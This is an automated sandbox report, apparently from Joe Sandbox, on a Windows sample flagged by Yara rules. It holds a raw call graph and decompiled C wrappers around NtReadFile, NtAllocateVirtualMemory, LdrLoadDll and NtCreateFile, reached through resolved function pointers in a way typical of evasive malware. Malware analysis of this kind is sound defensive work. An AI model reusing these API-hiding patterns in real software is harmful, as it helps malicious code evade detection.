414c61 41520->41523 41521->41513 41522 414ccc 41521->41522 41633 41a2e0 41522->41633 41525 414c66 41523->41525 41526 414c7a 41523->41526 41632 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 41525->41632 41529 414c97 41526->41529 41530 414c7f 41526->41530 41529->41517 41589 414410 41529->41589 41577 4146f0 41530->41577 41532 414c70 41532->41472 41534 414d2c 41637 41a490 41534->41637 41535 414c8d 41535->41472 41537 414caf 41537->41472 41539 414d38 41539->41472 41542 41b101 41540->41542 41541 41b113 41541->41475 41542->41541 41658 41bd40 41542->41658 41544 41b134 41661 414070 41544->41661 41546 41b180 41546->41475 41547 41b157 41547->41546 41548 414070 3 API calls 41547->41548 41550 41b179 41548->41550 41550->41546 41693 415390 41550->41693 41551 41b20a 41552 41b21a 41551->41552 41788 41af00 LdrLoadDll 41551->41788 41704 41ad70 41552->41704 41555 41b248 41783 419ec0 41555->41783 41559 419f1c 41558->41559 41560 41af60 LdrLoadDll 41558->41560 41816 16a967a 41559->41816 41560->41559 41561 419f37 41563 41bdc0 41561->41563 41819 41a670 41563->41819 41565 41b359 41565->41440 41567 409c20 41566->41567 41567->41469 41822 41b5a0 41567->41822 41571 41af60 LdrLoadDll 41570->41571 41572 414b44 41571->41572 41572->41505 41572->41506 41572->41507 41574 41af60 LdrLoadDll 41573->41574 41575 41a37c NtCreateFile 41574->41575 41575->41510 41578 41470c 41577->41578 41579 41a2e0 LdrLoadDll 41578->41579 41580 41472d 41579->41580 41581 414734 41580->41581 41582 414748 41580->41582 41583 41a490 2 API calls 41581->41583 41584 41a490 2 API calls 41582->41584 41586 41473d 41583->41586 41585 414751 41584->41585 41641 41bfd0 LdrLoadDll RtlAllocateHeap 41585->41641 41586->41535 41588 41475c 41588->41535 41590 41445b 41589->41590 41591 41448e 41589->41591 41593 41a2e0 LdrLoadDll 41590->41593 41592 4145d9 41591->41592 41596 4144aa 41591->41596 41594 41a2e0 LdrLoadDll 41592->41594 41595 414476 41593->41595 41601 4145f4 41594->41601 41597 41a490 2 API calls 41595->41597 41598 41a2e0 LdrLoadDll 41596->41598 41599 41447f 41597->41599 41600 4144c5 41598->41600 41599->41537 41603 4144e1 41600->41603 41604 4144cc 41600->41604 41654 41a320 LdrLoadDll 41601->41654 41607 4144e6 41603->41607 41608 4144fc 41603->41608 41606 41a490 2 API calls 41604->41606 41605 41462e 41609 41a490 2 API calls 41605->41609 41610 4144d5 41606->41610 41611 41a490 2 API calls 41607->41611 41616 414501 41608->41616 41642 41bf90 41608->41642 41613 414639 41609->41613 41610->41537 41612 4144ef 41611->41612 41612->41537 41613->41537 41624 414513 41616->41624 41645 41a410 41616->41645 41617 414567 41618 41457e 41617->41618 41653 41a2a0 LdrLoadDll 41617->41653 41619 414585 41618->41619 41620 41459a 41618->41620 41622 41a490 2 API calls 41619->41622 41623 41a490 2 API calls 41620->41623 41622->41624 41625 4145a3 41623->41625 41624->41537 41626 4145cf 41625->41626 41648 41bb90 41625->41648 41626->41537 41628 4145ba 41629 41bdc0 2 API calls 41628->41629 41630 4145c3 41629->41630 41630->41537 41631->41505 41632->41532 41634 414d14 41633->41634 41635 41af60 LdrLoadDll 41633->41635 41636 41a320 LdrLoadDll 41634->41636 41635->41634 41636->41534 41638 41af60 LdrLoadDll 41637->41638 41639 41a4ac NtClose 41638->41639 41639->41539 41640->41519 41641->41588 41655 41a630 41642->41655 41644 41bfa8 41644->41616 41646 41af60 LdrLoadDll 41645->41646 41647 41a42c NtReadFile 41646->41647 41647->41617 41649 41bbb4 41648->41649 41650 41bb9d 41648->41650 41649->41628 41650->41649 41651 41bf90 2 API calls 41650->41651 41652 41bbcb 41651->41652 41652->41628 41653->41618 41654->41605 41656 41af60 LdrLoadDll 41655->41656 41657 41a64c RtlAllocateHeap 41656->41657 41657->41644 41789 41a540 41658->41789 41660 41bd6d 41660->41544 41662 414081 41661->41662 41663 414089 41661->41663 41662->41547 41692 41435c 41663->41692 41792 41cf30 41663->41792 41665 4140dd 41666 41cf30 2 API calls 41665->41666 41669 4140e8 41666->41669 41667 414136 41670 41cf30 2 API calls 41667->41670 41669->41667 41671 41d060 3 API calls 41669->41671 41803 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 41669->41803 41673 41414a 41670->41673 41671->41669 41672 4141a7 41674 41cf30 2 API calls 41672->41674 41673->41672 41797 41d060 41673->41797 41676 4141bd 41674->41676 41677 4141fa 41676->41677 41680 41d060 3 API calls 41676->41680 41678 41cf30 2 API calls 41677->41678 41679 414205 41678->41679 41681 41d060 3 API calls 41679->41681 41687 41423f 41679->41687 41680->41676 41681->41679 41683 414334 41805 41cf90 LdrLoadDll RtlFreeHeap 41683->41805 41685 41433e 41806 41cf90 LdrLoadDll RtlFreeHeap 41685->41806 41804 41cf90 LdrLoadDll RtlFreeHeap 41687->41804 41688 414348 41807 41cf90 LdrLoadDll RtlFreeHeap 41688->41807 41690 414352 41808 41cf90 LdrLoadDll RtlFreeHeap 41690->41808 41692->41547 41694 409c10 LdrLoadDll 41693->41694 41695 4153a1 41694->41695 41696 414a50 8 API calls 41695->41696 41697 4153b7 41696->41697 41698 4153f2 41697->41698 41699 415405 41697->41699 41703 41540a 41697->41703 41700 41bdc0 2 API calls 41698->41700 41701 41bdc0 2 API calls 41699->41701 41702 4153f7 41700->41702 41701->41703 41702->41551 41703->41551 41705 41ad84 41704->41705 41706 41ac30 LdrLoadDll 41704->41706 41809 41ac30 41705->41809 41706->41705 41709 41ac30 LdrLoadDll 41710 41ad96 41709->41710 41711 41ac30 LdrLoadDll 41710->41711 41712 41ad9f 41711->41712 41713 41ac30 LdrLoadDll 41712->41713 41714 41ada8 41713->41714 41715 41ac30 LdrLoadDll 41714->41715 41716 41adb1 41715->41716 41717 41ac30 LdrLoadDll 41716->41717 41718 41adbd 41717->41718 41719 41ac30 LdrLoadDll 41718->41719 41720 41adc6 41719->41720 41721 41ac30 LdrLoadDll 41720->41721 41722 41adcf 41721->41722 41723 41ac30 LdrLoadDll 41722->41723 41724 41add8 41723->41724 41725 41ac30 LdrLoadDll 41724->41725 41726 41ade1 41725->41726 41727 41ac30 LdrLoadDll 41726->41727 41728 41adea 41727->41728 41729 41ac30 LdrLoadDll 41728->41729 41730 41adf6 41729->41730 41731 41ac30 LdrLoadDll 41730->41731 41732 41adff 41731->41732 41733 41ac30 LdrLoadDll 41732->41733 41734 41ae08 41733->41734 41735 41ac30 LdrLoadDll 41734->41735 41736 41ae11 41735->41736 41737 41ac30 LdrLoadDll 41736->41737 41738 41ae1a 41737->41738 41739 41ac30 LdrLoadDll 41738->41739 41740 41ae23 41739->41740 41741 41ac30 LdrLoadDll 41740->41741 41742 41ae2f 41741->41742 41743 41ac30 LdrLoadDll 41742->41743 41744 41ae38 41743->41744 41745 41ac30 LdrLoadDll 41744->41745 41746 41ae41 41745->41746 41747 41ac30 LdrLoadDll 41746->41747 41748 41ae4a 41747->41748 41749 41ac30 LdrLoadDll 41748->41749 41750 41ae53 41749->41750 41751 41ac30 LdrLoadDll 41750->41751 41752 41ae5c 41751->41752 41753 41ac30 LdrLoadDll 41752->41753 41754 41ae68 41753->41754 41755 41ac30 LdrLoadDll 41754->41755 41756 41ae71 41755->41756 41757 41ac30 LdrLoadDll 41756->41757 41758 41ae7a 41757->41758 41759 41ac30 LdrLoadDll 41758->41759 41760 41ae83 41759->41760 41761 41ac30 LdrLoadDll 41760->41761 41762 41ae8c 41761->41762 41763 41ac30 LdrLoadDll 41762->41763 41764 41ae95 41763->41764 41765 41ac30 LdrLoadDll 41764->41765 41766 41aea1 41765->41766 41767 41ac30 LdrLoadDll 41766->41767 41768 41aeaa 41767->41768 41769 41ac30 LdrLoadDll 41768->41769 41770 41aeb3 41769->41770 41771 41ac30 LdrLoadDll 41770->41771 41772 41aebc 41771->41772 41773 41ac30 LdrLoadDll 41772->41773 41774 41aec5 41773->41774 41775 41ac30 LdrLoadDll 41774->41775 41776 41aece 41775->41776 41777 41ac30 LdrLoadDll 41776->41777 41778 41aeda 41777->41778 41779 41ac30 LdrLoadDll 41778->41779 41780 41aee3 41779->41780 41781 41ac30 LdrLoadDll 41780->41781 41782 41aeec 41781->41782 41782->41555 41784 41af60 LdrLoadDll 41783->41784 41785 419edc 41784->41785 41815 16a9860 LdrInitializeThunk 41785->41815 41786 419ef3 41786->41475 41788->41552 41790 41af60 LdrLoadDll 41789->41790 41791 41a55c NtAllocateVirtualMemory 41790->41791 41791->41660 41793 41cf40 41792->41793 41794 41cf46 41792->41794 41793->41665 41795 41bf90 2 API calls 41794->41795 41796 41cf6c 41795->41796 41796->41665 41798 41cfd0 41797->41798 41799 41d02d 41798->41799 41800 41bf90 2 API calls 41798->41800 41799->41673 41801 41d00a 41800->41801 41802 41bdc0 2 API calls 41801->41802 41802->41799 41803->41669 41804->41683 41805->41685 41806->41688 41807->41690 41808->41692 41810 41ac4b 41809->41810 41811 414e50 LdrLoadDll 41810->41811 41812 41ac6b 41811->41812 41813 414e50 LdrLoadDll 41812->41813 41814 41ad17 41812->41814 41813->41814 41814->41709 41815->41786 41817 16a968f LdrInitializeThunk 41816->41817 41818 16a9681 41816->41818 41817->41561 41818->41561 41820 41a68c RtlFreeHeap 41819->41820 41821 41af60 LdrLoadDll 41819->41821 41820->41565 41821->41820 41823 41b5c3 41822->41823 41826 40acf0 41823->41826 41827 40ad14 41826->41827 41828 409c71 41827->41828 41829 40ad50 LdrLoadDll 41827->41829 41828->41469 41829->41828 41831 407eb0 41830->41831 41832 407eab 41830->41832 41833 41bd40 2 API calls 41831->41833 41832->41483 41840 407ed5 41833->41840 41834 407f38 41834->41483 41835 419ec0 2 API calls 41835->41840 41836 407f3e 41837 407f64 41836->41837 41839 41a5c0 2 API calls 41836->41839 41837->41483 41841 407f55 41839->41841 41840->41834 41840->41835 41840->41836 41842 41bd40 2 API calls 41840->41842 41846 41a5c0 41840->41846 41841->41483 41842->41840 41844 41a5c0 2 API calls 41843->41844 41845 40817e 41844->41845 41845->41442 41847 41af60 LdrLoadDll 41846->41847 41848 41a5dc 41847->41848 41851 16a96e0 LdrInitializeThunk 41848->41851 41849 41a5f3 41849->41840 41851->41849 41853 40b063 41852->41853 41855 40b0e0 41853->41855 41867 419c90 LdrLoadDll 41853->41867 41855->41456 41857 41af60 LdrLoadDll 41856->41857 41858 40f1bb 41857->41858 41858->41464 41859 41a7d0 41858->41859 41860 41a7ef LookupPrivilegeValueW 41859->41860 41861 41af60 LdrLoadDll 41859->41861 41860->41460 41861->41860 41863 41a27c 41862->41863 41864 41af60 LdrLoadDll 41862->41864 41868 16a9910 LdrInitializeThunk 41863->41868 41864->41863 41865 41a29b 41865->41461 41867->41855 41868->41865 41870 40b1f0 41869->41870 41871 40b040 LdrLoadDll 41870->41871 41872 40b204 41871->41872 41872->41397 41874 40ae51 41873->41874 41875 40ae4d 41873->41875 41876 40ae9c 41874->41876 41878 40ae6a 41874->41878 41875->41400 41922 419cd0 LdrLoadDll 41876->41922 41921 419cd0 LdrLoadDll 41878->41921 41879 40aead 41879->41400 41881 40ae8c 41881->41400 41883 40f4a0 3 API calls 41882->41883 41884 4143c6 41883->41884 41884->41402 41886 408a6c 41885->41886 41923 4087a0 41886->41923 41889 408a9d 41889->41404 41890 4087a0 19 API calls 41891 408a8a 41890->41891 41891->41889 41941 40f710 10 API calls 41891->41941 41894 41a506 41893->41894 41895 41af60 LdrLoadDll 41894->41895 41896 41a51c 41895->41896 42062 16a98f0 LdrInitializeThunk 41896->42062 41897 40c322 41899 40f4a0 41897->41899 41900 40f4bd 41899->41900 42063 419fc0 41900->42063 41903 40f505 41903->41408 41904 41a010 2 API calls 41905 40f52e 41904->41905 41905->41408 41907 41af60 LdrLoadDll 41906->41907 41908 41a02c 41907->41908 42069 16a9780 LdrInitializeThunk 41908->42069 41909 40c385 41909->41414 41909->41417 41912 41af60 LdrLoadDll 41911->41912 41913 41a07c 41912->41913 42070 16a97a0 LdrInitializeThunk 41913->42070 41914 40c459 41914->41425 41917 41af60 LdrLoadDll 41916->41917 41918 419e3c 41917->41918 42071 16a9a20 LdrInitializeThunk 41918->42071 41919 40c4ac 41919->41429 41921->41881 41922->41879 41924 407ea0 4 API calls 41923->41924 41939 4087ba 41924->41939 41925 408a49 41925->41889 41925->41890 41926 408a3f 41927 408160 2 API calls 41926->41927 41927->41925 41930 419f00 2 API calls 41930->41939 41932 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 41932->41939 41933 41a490 LdrLoadDll NtClose 41933->41939 41938 419e20 2 API calls 41938->41939 41939->41925 41939->41926 41939->41930 41939->41932 41939->41933 41939->41938 41942 419d10 41939->41942 41945 4085d0 41939->41945 41959 40f5f0 LdrLoadDll NtClose 41939->41959 41960 419d90 LdrLoadDll 41939->41960 41961 419dc0 LdrLoadDll 41939->41961 41962 419e50 LdrLoadDll 41939->41962 41963 4083a0 41939->41963 41979 405f60 LdrLoadDll 41939->41979 41941->41889 41943 419d2c 41942->41943 41944 41af60 LdrLoadDll 41942->41944 41943->41939 41944->41943 41946 4085e6 41945->41946 41980 419880 41946->41980 41948 4085ff 41949 409c10 LdrLoadDll 41948->41949 41958 408771 41948->41958 41950 4086a4 41949->41950 42001 4081a0 41950->42001 41952 4086e5 41953 4083a0 11 API calls 41952->41953 41952->41958 41954 408713 41953->41954 41955 419f00 2 API calls 41954->41955 41954->41958 41956 408748 41955->41956 41957 41a500 2 API calls 41956->41957 41956->41958 41957->41958 41958->41939 41959->41939 41960->41939 41961->41939 41962->41939 41964 4083c9 41963->41964 42041 408310 41964->42041 41967 41a500 2 API calls 41968 4083dc 41967->41968 41968->41967 41969 408467 41968->41969 41971 408462 41968->41971 42049 40f670 41968->42049 41969->41939 41970 41a490 2 API calls 41972 40849a 41970->41972 41971->41970 41972->41969 41973 419d10 LdrLoadDll 41972->41973 41974 4084ff 41973->41974 41974->41969 42053 419d50 41974->42053 41976 408563 41976->41969 41977 414a50 8 API calls 41976->41977 41978 4085b8 41977->41978 41978->41939 41979->41939 41981 41bf90 2 API calls 41980->41981 41982 419897 41981->41982 42008 409310 41982->42008 41984 4198b2 41985 4198f0 41984->41985 41986 4198d9 41984->41986 41989 41bd40 2 API calls 41985->41989 41987 41bdc0 2 API calls 41986->41987 41988 4198e6 41987->41988 41988->41948 41990 41992a 41989->41990 41991 41bd40 2 API calls 41990->41991 41992 419943 41991->41992 41998 419be4 41992->41998 42014 41bd80 41992->42014 41995 419bd0 41996 41bdc0 2 API calls 41995->41996 41997 419bda 41996->41997 41997->41948 41999 41bdc0 2 API calls 41998->41999 42000 419c39 41999->42000 42000->41948 42002 40829f 42001->42002 42004 4081b5 42001->42004 42002->41952 42003 414a50 8 API calls 42006 408222 42003->42006 42004->42002 42004->42003 42005 408249 42005->41952 42006->42005 42007 41bdc0 2 API calls 42006->42007 42007->42005 42009 409335 42008->42009 42010 40acf0 LdrLoadDll 42009->42010 42011 409368 42010->42011 42013 40938d 42011->42013 42017 40cf20 42011->42017 42013->41984 42035 41a580 42014->42035 42018 40cf4c 42017->42018 42019 41a1e0 LdrLoadDll 42018->42019 42020 40cf65 42019->42020 42021 40cf6c 42020->42021 42028 41a220 42020->42028 42021->42013 42025 40cfa7 42026 41a490 2 API calls 42025->42026 42027 40cfca 42026->42027 42027->42013 42029 41a23c 42028->42029 42030 41af60 LdrLoadDll 42028->42030 42034 16a9710 LdrInitializeThunk 42029->42034 42030->42029 42031 40cf8f 42031->42021 42033 41a810 LdrLoadDll 42031->42033 42033->42025 42034->42031 42036 41af60 LdrLoadDll 42035->42036 42037 41a59c 42036->42037 42040 16a9a00 LdrInitializeThunk 42037->42040 42038 419bc9 42038->41995 42038->41998 42040->42038 42042 408328 42041->42042 42043 40acf0 LdrLoadDll 42042->42043 42044 408343 42043->42044 42045 414e50 LdrLoadDll 42044->42045 42046 408353 42045->42046 42047 40835c PostThreadMessageW 42046->42047 42048 408370 42046->42048 42047->42048 42048->41968 42050 40f683 42049->42050 42056 419e90 42050->42056 42054 419d6c 42053->42054 42055 41af60 LdrLoadDll 42053->42055 42054->41976 42055->42054 42057 41af60 LdrLoadDll 42056->42057 42058 419eac 42057->42058 42061 16a9840 LdrInitializeThunk 42058->42061 42059 40f6ae 42059->41968 42061->42059 42062->41897 42064 419fdc 42063->42064 42065 41af60 LdrLoadDll 42063->42065 42068 16a99a0 LdrInitializeThunk 42064->42068 42065->42064 42066 40f4fe 42066->41903 42066->41904 42068->42066 42069->41909 42070->41914 42071->41919 42073 16a9540 LdrInitializeThunk

                    Executed Functions

                    Function 0041A45A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 31%
                    			E0041A45A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				signed int _v117;
				intOrPtr* __esi;
				void* _t27;
				void* _t36;
				void* _t37;
				intOrPtr* _t38;
				void* _t40;

				if(__eax !=  *((intOrPtr*)(__eax + 0x66))) {
					_t22 = _a4;
					_t38 = _a4 + 0xc48;
					E0041AF60(_t36, _t22, _t38,  *((intOrPtr*)(_t22 + 0x10)), 0, 0x2a);
					_t5 =  &_a40; // 0x414a31
					_t7 =  &_a32; // 0x414d72
					_t13 =  &_a8; // 0x414d72
					_t27 =  *((intOrPtr*)( *_t38))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, _t37, _t40); // executed
					return _t27;
				} else {
					_v117 =  !_v117;
					__ebp = __esp;
					__eax = _a4;
					_t17 = __eax + 0x10; // 0x300
					_t18 = __eax + 0xc4c; // 0x40a93f
					__esi = _t18;
					E0041AF60(__edi, _a4, __esi,  *_t17, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}










                    0x0041a45d
                    0x0041a413
                    0x0041a41f
                    0x0041a427
                    0x0041a42c
                    0x0041a432
                    0x0041a44d
                    0x0041a455
                    0x0041a459
                    0x0041a45f
                    0x0041a45f
                    0x0041a461
                    0x0041a463
                    0x0041a466
                    0x0041a46f
                    0x0041a46f
                    0x0041a47f
                    0x0041a485
                    0x0041a487
                    0x0041a488
                    0x0041a489
                    0x0041a489

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: 8876a3ec1277deb47a7b7d63f11212dedcb0330a4eb7a845683de2f60b355a70
                    • Instruction ID: 0a5dfef0a32a943c0cbb71fd4efb581bb3984a664a9ef13d40aac49e5e2b3856
                    • Opcode Fuzzy Hash: 8876a3ec1277deb47a7b7d63f11212dedcb0330a4eb7a845683de2f60b355a70
                    • Instruction Fuzzy Hash: 771109B2200208AFCB14DF99DC85EEB77A9EF8C764F158659FA1D97241C634E911CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 8 41a410-41a459 call 41af60 NtReadFile
                    C-Code - Quality: 37%
                    			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                    0x0041a413
                    0x0041a41f
                    0x0041a427
                    0x0041a42c
                    0x0041a432
                    0x0041a44d
                    0x0041a455
                    0x0041a459

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A53A Relevance: 1.6, APIs: 1, Instructions: 57memorynativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 232 41a53a-41a53b 233 41a506-41a539 call 41af60 call 16a98f0 232->233 234 41a53d-41a556 232->234 235 41a55c-41a57d NtAllocateVirtualMemory 234->235 236 41a557 call 41af60 234->236 236->235
                    C-Code - Quality: 50%
                    			E0041A53A(void* __eax, void* __eflags) {
				void* __esi;
				void* _t21;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;

				_pop(_t31);
				if(__eflags > 0) {
					_t29 = __eax + 0xc5c;
					E0041AF60(_t27, __eax, _t29,  *((intOrPtr*)(__eax + 0x10)), 0, 0x2f);
					_t21 =  *((intOrPtr*)( *_t29))( *((intOrPtr*)(_t31 + 0xc)),  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14)),  *((intOrPtr*)(_t31 + 0x18)),  *((intOrPtr*)(_t31 + 0x1c)), _t28); // executed
					return _t21;
				} else {
					__eflags = __eax;
					__ebp = __esp;
					__eax =  *(__ebp + 8);
					_t10 = __eax + 0xc60; // 0xca0
					__esi = _t10;
					 *(__ebp + 0x1c) =  *(__ebp + 0x10);
					__eax = NtAllocateVirtualMemory( *(__ebp + 0xc),  *(__ebp + 0x10),  *(__ebp + 0x14),  *(__ebp + 0x18),  *(__ebp + 0x1c),  *(__ebp + 0x20)); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}









                    0x0041a53a
                    0x0041a53b
                    0x0041a50f
                    0x0041a517
                    0x0041a535
                    0x0041a539
                    0x0041a53d
                    0x0041a53d
                    0x0041a541
                    0x0041a543
                    0x0041a54f
                    0x0041a54f
                    0x0041a56d
                    0x0041a579
                    0x0041a57b
                    0x0041a57c
                    0x0041a57d
                    0x0041a57d

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: db9f86a093b4da20f97a9242ba39c5fafcae6d1b63f48eb8d3bcbec8101a7816
                    • Instruction ID: 21307fda9ad7a26ef85617c9d29a718da9cb2769e425a7457b0e62520968388f
                    • Opcode Fuzzy Hash: db9f86a093b4da20f97a9242ba39c5fafcae6d1b63f48eb8d3bcbec8101a7816
                    • Instruction Fuzzy Hash: C41157B2200208AFDB18DF88DC85EEB77ADEF8C754F148559BA1D97241C634E821CBB4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 256 40acf0-40ad0c 257 40ad14-40ad19 256->257 258 40ad0f call 41cc50 256->258 259 40ad1b-40ad1e 257->259 260 40ad1f-40ad2d call 41d070 257->260 258->257 263 40ad3d-40ad4e call 41b4a0 260->263 264 40ad2f-40ad3a call 41d2f0 260->264 269 40ad50-40ad64 LdrLoadDll 263->269 270 40ad67-40ad6a 263->270 264->263 269->270
                    C-Code - Quality: 100%
                    			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                    0x0040ad0c
                    0x0040ad0f
                    0x0040ad14
                    0x0040ad19
                    0x0040ad23
                    0x0040ad28
                    0x0040ad2b
                    0x0040ad2d
                    0x0040ad35
                    0x0040ad3a
                    0x0040ad3a
                    0x0040ad41
                    0x0040ad49
                    0x0040ad4c
                    0x0040ad4e
                    0x0040ad62
                    0x00000000
                    0x0040ad64
                    0x0040ad6a
                    0x0040ad1e
                    0x0040ad1e
                    0x0040ad1e

                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 271 41a35a-41a35d 272 41a360-41a3a5 call 41af60 271->272 273 41a3a7-41a3b1 NtCreateFile 271->273 272->273
                    C-Code - Quality: 79%
                    			E0041A35A(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v62;
				long _t22;
				void* _t34;

				asm("lock jnp 0x4a");
				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E0041AF60(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                    0x0041a35d
                    0x0041a363
                    0x0041a36f
                    0x0041a377
                    0x0041a3ad
                    0x0041a3b1

                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f53bba97eca0d91c0a91de91a1e3732046dc1a3467853b5625b36a7a8df1dd1c
                    • Instruction ID: 684d7f5abf03f03817ec3704d67b56e5a6037b44533e858ef8714a0877ac7ffa
                    • Opcode Fuzzy Hash: f53bba97eca0d91c0a91de91a1e3732046dc1a3467853b5625b36a7a8df1dd1c
